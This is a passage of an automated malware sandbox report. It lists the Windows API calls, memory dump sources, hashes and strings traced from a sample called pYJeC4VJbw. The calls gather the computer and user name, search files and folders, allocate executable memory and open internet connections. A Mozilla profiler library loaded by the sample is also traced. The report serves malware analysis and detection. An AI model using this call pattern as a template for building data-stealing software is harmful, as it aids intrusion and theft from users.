                                                                                                        • Part of subcall function 00411650: wsprintfA.USER32 ref: 00411669
                                                                                                        • Part of subcall function 00411650: FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                      • strtok_s.MSVCRT ref: 00411A4D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: strtok_s$FileFindFirstwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 3409980764-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 2452939696-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B190
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040B1A4
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$AllocInternetLocalOpenmemcmpmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 574041509-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040A95A
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040A96E
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3635112192-0
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040AC1E
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040AC32
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                        • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                        • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                        • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02DD4F80), ref: 00404ED9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$lstrcat$InternetOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 3635112192-0
                                                                                                      • Opcode ID: 7dadc5b4cd3413107dca7a81a3c4ca659646e7b67e58f26f151010d40cbba245
                                                                                                      • Instruction ID: 57c8c1270dba92ae3db9aa8e51dd660502e79bf125d10b7c0566732e7217b02b
                                                                                                      • Opcode Fuzzy Hash: 7dadc5b4cd3413107dca7a81a3c4ca659646e7b67e58f26f151010d40cbba245
                                                                                                      • Instruction Fuzzy Hash: C07153759102049BCF14FBA1DC52DEE7739BF54308F41422EF506A7191EF38AA89CBA9
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(004067AE,004067AE,00003000,00000040), ref: 004060F6
                                                                                                      • VirtualAlloc.KERNEL32(00000000,004067AE,00003000,00000040), ref: 00406143
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AllocVirtual
                                                                                                      • String ID:
                                                                                                      • API String ID: 4275171209-0
                                                                                                      • Opcode ID: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                      • Instruction ID: 5341a9e810d76a35e886a0404415562c2a616bd51e9685e0b668c9c894d7d0dc
                                                                                                      • Opcode Fuzzy Hash: a813d0be407c7e97fb4ae0c443796924326960eff0d044c67b11f739482c465e
                                                                                                      • Instruction Fuzzy Hash: 8341DE34A00209EFCB54CF58C494BADBBB1FF44314F1482A9E95AAB395C735AA91CB84
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040110E,?,?,004136DC), ref: 00401073
                                                                                                      • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040110E,?,?,004136DC), ref: 004010B7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocFree
                                                                                                      • String ID:
                                                                                                      • API String ID: 2087232378-0
                                                                                                      • Opcode ID: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                      • Instruction ID: a2913bed729a6fe358320823385779fc3d8f71f1cc7b0a13f7ab4b92dd49de4a
                                                                                                      • Opcode Fuzzy Hash: 1fafdb83e91c72df66fc5e0dfbe5cc959ff82812f546fe48c521c8e5e261a801
                                                                                                      • Instruction Fuzzy Hash: 42F027B1641208BBE724DAF4AC59FAFF79CA745B05F304559F980E3390DA719F00CAA4
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetFileAttributesA.KERNEL32(00000000,?,0040E9F4,?,00000000,?,00000000,0041D76E,0041D76B), ref: 0041549F
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AttributesFile
                                                                                                      • String ID:
                                                                                                      • API String ID: 3188754299-0
                                                                                                      • Opcode ID: be0baeed0cddd4351448173c283cfc01bb64caa5fd23e79b8f8fa40c9ce29eef
                                                                                                      • Instruction ID: 7a99a0210fb0b6ed6de77f6d22eec219e0a4aedfc9bcf57955c7481c69c901e8
                                                                                                      • Opcode Fuzzy Hash: be0baeed0cddd4351448173c283cfc01bb64caa5fd23e79b8f8fa40c9ce29eef
                                                                                                      • Instruction Fuzzy Hash: 9BF01C70C00608EBCB10EF94C9457DDBB74AF44315F10829AD82957380DB395A85CB89
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FolderPathlstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1699248803-0
                                                                                                      • Opcode ID: c7c707a7e520d0d67f3c3eb60cec8b26d92ba5516e27f83f13e6734a7a38c3a4
                                                                                                      • Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
                                                                                                      • Opcode Fuzzy Hash: c7c707a7e520d0d67f3c3eb60cec8b26d92ba5516e27f83f13e6734a7a38c3a4
                                                                                                      • Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02DD51E0,004136EB,0041D6E3), ref: 004143CD
                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                      • ExitProcess.KERNEL32 ref: 00401186
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                      • String ID:
                                                                                                      • API String ID: 1004333139-0
                                                                                                      • Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                      • Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
                                                                                                      • Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
                                                                                                      • Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: malloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 2803490479-0
                                                                                                      • Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                      • Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
                                                                                                      • Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
                                                                                                      • Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CFA5492
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CFA54A8
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CFA54BE
                                                                                                      • __Init_thread_footer.LIBCMT ref: 6CFA54DB
                                                                                                        • Part of subcall function 6CFCAB3F: EnterCriticalSection.KERNEL32(6D01E370,?,?,6CF93527,6D01F6CC,?,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB49
                                                                                                        • Part of subcall function 6CFCAB3F: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF93527,6D01F6CC,?,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCAB7C
                                                                                                        • Part of subcall function 6CFCCBE8: GetCurrentProcess.KERNEL32(?,6CF931A7), ref: 6CFCCBF1
                                                                                                        • Part of subcall function 6CFCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CF931A7), ref: 6CFCCBFA
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA54F9
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6CFA5516
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA556A
                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFA5577
                                                                                                      • moz_xmalloc.MOZGLUE(00000070), ref: 6CFA5585
                                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6CFA5590
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6CFA55E6
                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6D01F4B8), ref: 6CFA5606
                                                                                                      • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CFA5616
                                                                                                        • Part of subcall function 6CFCAB89: EnterCriticalSection.KERNEL32(6D01E370,?,?,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284), ref: 6CFCAB94
                                                                                                        • Part of subcall function 6CFCAB89: LeaveCriticalSection.KERNEL32(6D01E370,?,6CF934DE,6D01F6CC,?,?,?,?,?,?,?,6CF93284,?,?,6CFB56F6), ref: 6CFCABD1
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA563E
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CFA5646
                                                                                                      • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6CFA567C
                                                                                                      • free.MOZGLUE(?), ref: 6CFA56AE
                                                                                                        • Part of subcall function 6CFB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CFB5EDB
                                                                                                        • Part of subcall function 6CFB5E90: memset.VCRUNTIME140(6CFF7765,000000E5,55CCCCCC), ref: 6CFB5F27
                                                                                                        • Part of subcall function 6CFB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CFB5FB2
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6CFA56E8
                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6CFA5707
                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6CFA570F
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6CFA5729
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6CFA574E
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6CFA576B
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6CFA5796
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6CFA57B3
                                                                                                      • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6CFA57CA
                                                                                                      Strings
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6CFA5B38
                                                                                                      • [I %d/%d] profiler_init, xrefs: 6CFA564E
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6CFA5717
                                                                                                      • MOZ_BASE_PROFILER_LOGGING, xrefs: 6CFA54B9
                                                                                                      • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6CFA5BBE
                                                                                                      • MOZ_PROFILER_STARTUP, xrefs: 6CFA55E1
                                                                                                      • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CFA54A3
                                                                                                      • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6CFA5D1C
                                                                                                      • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6CFA5749
                                                                                                      • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CFA548D
                                                                                                      • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CFA5766
                                                                                                      • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CFA5791
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6CFA5C56
                                                                                                      • MOZ_BASE_PROFILER_HELP, xrefs: 6CFA5511
                                                                                                      • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CFA57C5
                                                                                                      • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6CFA5D2B
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6CFA5AC9
                                                                                                      • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6CFA5CF9
                                                                                                      • GeckoMain, xrefs: 6CFA5554, 6CFA55D5
                                                                                                      • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6CFA56E3
                                                                                                      • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6CFA57AE
                                                                                                      • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6CFA5D01
                                                                                                      • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CFA5724
                                                                                                      • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6CFA584E
                                                                                                      • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6CFA5D24
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
